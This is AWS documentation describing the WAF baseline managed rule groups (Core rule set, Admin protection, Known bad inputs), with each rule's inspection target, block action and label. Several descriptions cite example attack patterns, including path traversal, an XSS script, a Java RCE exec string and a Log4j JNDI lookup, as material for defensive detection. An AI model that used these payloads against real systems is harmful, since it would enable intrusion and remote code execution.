Baseline rule groups - AWS WAF, AWS Firewall Manager, and AWS Shield Advanced
Core rule set (CRS)Admin protectionKnown bad inputs

Baseline rule groups

Baseline managed rule groups provide general protection against a wide variety of common threats. Choose one or more of these rule groups to establish baseline protection for your resources.

Core rule set (CRS) managed rule group

VendorName: AWS, Name: AWSManagedRulesCommonRuleSet, WCU: 700

The Core rule set (CRS) rule group contains rules that are generally applicable to web applications. This provides protection against exploitation of a wide range of vulnerabilities, including some of the high risk and commonly occurring vulnerabilities described in OWASP publications such as OWASP Top 10. Consider using this rule group for any AWS WAF use case.

Note

This table describes the latest static version of this rule group. For other versions, use the API command DescribeManagedRuleGroup.

Rule name Description and label
NoUserAgent_HEADER

Inspects for requests that are missing the HTTP User-Agent header.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:NoUserAgent_Header
UserAgent_BadBots_HEADER

Inspects for common User-Agent header values that indicate that the request is a bad bot. Example patterns include nessus, and nmap. For bot management, see also AWS WAF Bot Control rule group.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:BadBots_Header
SizeRestrictions_QUERYSTRING

Inspects for URI query strings that are over 2,048 bytes.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString
SizeRestrictions_Cookie_HEADER

Inspects for cookie headers that are over 10,240 bytes.

Warning

This rule only inspects the first 8 KB of the request cookies or the first 200 cookies, whichever limit is reached first. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header
SizeRestrictions_BODY

Inspects for request bodies that are over 8 KB (8,192 bytes).

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:SizeRestrictions_Body
SizeRestrictions_URIPATH

Inspects for URI paths that are over 1,024 bytes.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath
EC2MetaDataSSRF_BODY

Inspects for attempts to exfiltrate Amazon EC2 metadata from the request body.

Warning

This rule only inspects the first 8 KB of the request body. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body
EC2MetaDataSSRF_COOKIE

Inspects for attempts to exfiltrate Amazon EC2 metadata from the request cookie.

Warning

This rule only inspects the first 8 KB of the request cookies or the first 200 cookies, whichever limit is reached first. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie
EC2MetaDataSSRF_URIPATH

Inspects for attempts to exfiltrate Amazon EC2 metadata from the request URI path.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath
EC2MetaDataSSRF_QUERYARGUMENTS

Inspects for attempts to exfiltrate Amazon EC2 metadata from the request query arguments.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments
GenericLFI_QUERYARGUMENTS

Inspects for the presence of Local File Inclusion (LFI) exploits in the query arguments. Examples include path traversal attempts using techniques like ../../.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments
GenericLFI_URIPATH

Inspects for the presence of Local File Inclusion (LFI) exploits in the URI path. Examples include path traversal attempts using techniques like ../../.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:GenericLFI_URIPath
GenericLFI_BODY

Inspects for the presence of Local File Inclusion (LFI) exploits in the request body. Examples include path traversal attempts using techniques like ../../.

Warning

This rule only inspects the first 8 KB of the request body. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:GenericLFI_Body
RestrictedExtensions_URIPATH

Inspects for requests whose URI paths contain system file extensions that are unsafe to read or run. Example patterns include extensions like .log and .ini.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath
RestrictedExtensions_QUERYARGUMENTS

Inspects for requests whose query arguments contain system file extensions that are unsafe to read or run. Example patterns include extensions like .log and .ini.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments
GenericRFI_QUERYARGUMENTS

Inspects the values of all query parameters for attempts to exploit RFI (Remote File Inclusion) in web applications by embedding URLs that contain IPv4 addresses. Examples include patterns like http://, https://, ftp://, ftps://, and file://, with an IPv4 host header in the exploit attempt.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments
GenericRFI_BODY

Inspects the request body for attempts to exploit RFI (Remote File Inclusion) in web applications by embedding URLs that contain IPv4 addresses. Examples include patterns like http://, https://, ftp://, ftps://, and file://, with an IPv4 host header in the exploit attempt.

Warning

This rule only inspects the first 8 KB of the request body. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:GenericRFI_Body
GenericRFI_URIPATH

Inspects the URI path for attempts to exploit RFI (Remote File Inclusion) in web applications by embedding URLs that contain IPv4 addresses. Examples include patterns like http://, https://, ftp://, ftps://, and file://, with an IPv4 host header in the exploit attempt.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:GenericRFI_URIPath
CrossSiteScripting_COOKIE

Inspects the values of cookie headers for common cross-site scripting (XSS) patterns using the built-in AWS WAF Cross-site scripting attack rule statement. Example patterns include scripts like <script>alert("hello")</script>.

Warning

This rule only inspects the first 8 KB of the request cookies or the first 200 cookies, whichever limit is reached first. For information, see Inspection of the request body, headers, and cookies.

Note

The rule match details in the AWS WAF logs is not populated for version 2.0 of this rule group.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie
CrossSiteScripting_QUERYARGUMENTS

Inspects the values of query arguments for common cross-site scripting (XSS) patterns using the built-in AWS WAF Cross-site scripting attack rule statement. Example patterns include scripts like <script>alert("hello")</script>.

Note

The rule match details in the AWS WAF logs is not populated for version 2.0 of this rule group.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments
CrossSiteScripting_BODY

Inspects the request body for common cross-site scripting (XSS) patterns using the built-in AWS WAF Cross-site scripting attack rule statement. Example patterns include scripts like <script>alert("hello")</script>.

Note

The rule match details in the AWS WAF logs is not populated for version 2.0 of this rule group.

Warning

This rule only inspects the first 8 KB of the request body. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body
CrossSiteScripting_URIPATH

Inspects the value of the URI path for common cross-site scripting (XSS) patterns using the built-in AWS WAF Cross-site scripting attack rule statement. Example patterns include scripts like <script>alert("hello")</script>.

Note

The rule match details in the AWS WAF logs is not populated for version 2.0 of this rule group.

Rule action: Block

Label: awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath

Admin protection managed rule group

VendorName: AWS, Name: AWSManagedRulesAdminProtectionRuleSet, WCU: 100

The Admin protection rule group contains rules that allow you to block external access to exposed administrative pages. This might be useful if you run third-party software or want to reduce the risk of a malicious actor gaining administrative access to your application.

Note

This table describes the latest static version of this rule group. For other versions, use the API command DescribeManagedRuleGroup.

Rule name Description and label
AdminProtection_URIPATH

Inspects for URI paths that are generally reserved for administration of a web server or application. Example patterns include sqlmanager.

Rule action: Block

Label: awswaf:managed:aws:admin-protection:AdminProtection_URIPath

Known bad inputs managed rule group

VendorName: AWS, Name: AWSManagedRulesKnownBadInputsRuleSet, WCU: 200

The Known bad inputs rule group contains rules to block request patterns that are known to be invalid and are associated with exploitation or discovery of vulnerabilities. This can help reduce the risk of a malicious actor discovering a vulnerable application.

Note

This table describes the latest static version of this rule group. For other versions, use the API command DescribeManagedRuleGroup.

Rule name Description and label
JavaDeserializationRCE_HEADER

Inspects the keys and values of HTTP request headers for patterns indicating Java deserialization Remote Command Execution(RCE) attempts, such as the Spring Core and Cloud Function RCE vulnerabilities (CVE-2022-22963, CVE-2022-22965). Example patterns include (java.lang.Runtime).getRuntime().exec("whoami").

Warning

This rule only inspects the first 8 KB of the request headers or the first 200 headers, whichever limit is reached first. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header

JavaDeserializationRCE_BODY

Inspects the request body for patterns indicating Java deserialization Remote Command Execution(RCE) attempts, such as the Spring Core and Cloud Function RCE vulnerabilities (CVE-2022-22963, CVE-2022-22965). Example patterns include (java.lang.Runtime).getRuntime().exec("whoami").

Warning

This rule only inspects the first 8 KB of the request body. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body
JavaDeserializationRCE_URIPATH

Inspects the request URI for patterns indicating Java deserialization Remote Command Execution(RCE) attempts, such as the Spring Core and Cloud Function RCE vulnerabilities (CVE-2022-22963, CVE-2022-22965). Example patterns include (java.lang.Runtime).getRuntime().exec("whoami").

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath
JavaDeserializationRCE_QUERYSTRING

Inspects the request query string for patterns indicating Java deserialization Remote Command Execution(RCE) attempts, such as the Spring Core and Cloud Function RCE vulnerabilities (CVE-2022-22963, CVE-2022-22965). Example patterns include (java.lang.Runtime).getRuntime().exec("whoami").

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString
Host_localhost_HEADER

Inspects the host header in the request for patterns indicating localhost. Example patterns include localhost.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header
PROPFIND_METHOD

Inspects the HTTP method in the request for PROPFIND, which is a method similar to HEAD, but with the extra intention to exfiltrate XML objects.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:Propfind_Method
ExploitablePaths_URIPATH

Inspects the URI path for attempts to access exploitable web application paths. Example patterns include paths like web-inf.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath
Log4JRCE_HEADER

Inspects the keys and values of request headers for the presence of the Log4j vulnerability (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) and protects against Remote Code Execution (RCE) attempts. Example patterns include ${jndi:ldap://example.com/}.

Warning

This rule only inspects the first 8 KB of the request headers or the first 200 headers, whichever limit is reached first. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header
Log4JRCE_QUERYSTRING

Inspects the query string for the presence of the Log4j vulnerability (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) and protects against Remote Code Execution (RCE) attempts. Example patterns include ${jndi:ldap://example.com/}.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString
Log4JRCE_BODY

Inspects the body for the presence of the Log4j vulnerability (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) and protects against Remote Code Execution (RCE) attempts. Example patterns include ${jndi:ldap://example.com/}.

Warning

This rule only inspects the first 8 KB of the request body. For information, see Inspection of the request body, headers, and cookies.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body
Log4JRCE_URIPATH

Inspects the URI path for the presence of the Log4j vulnerability (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) and protects against Remote Code Execution (RCE) attempts. Example patterns include ${jndi:ldap://example.com/}.

Rule action: Block

Label: awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath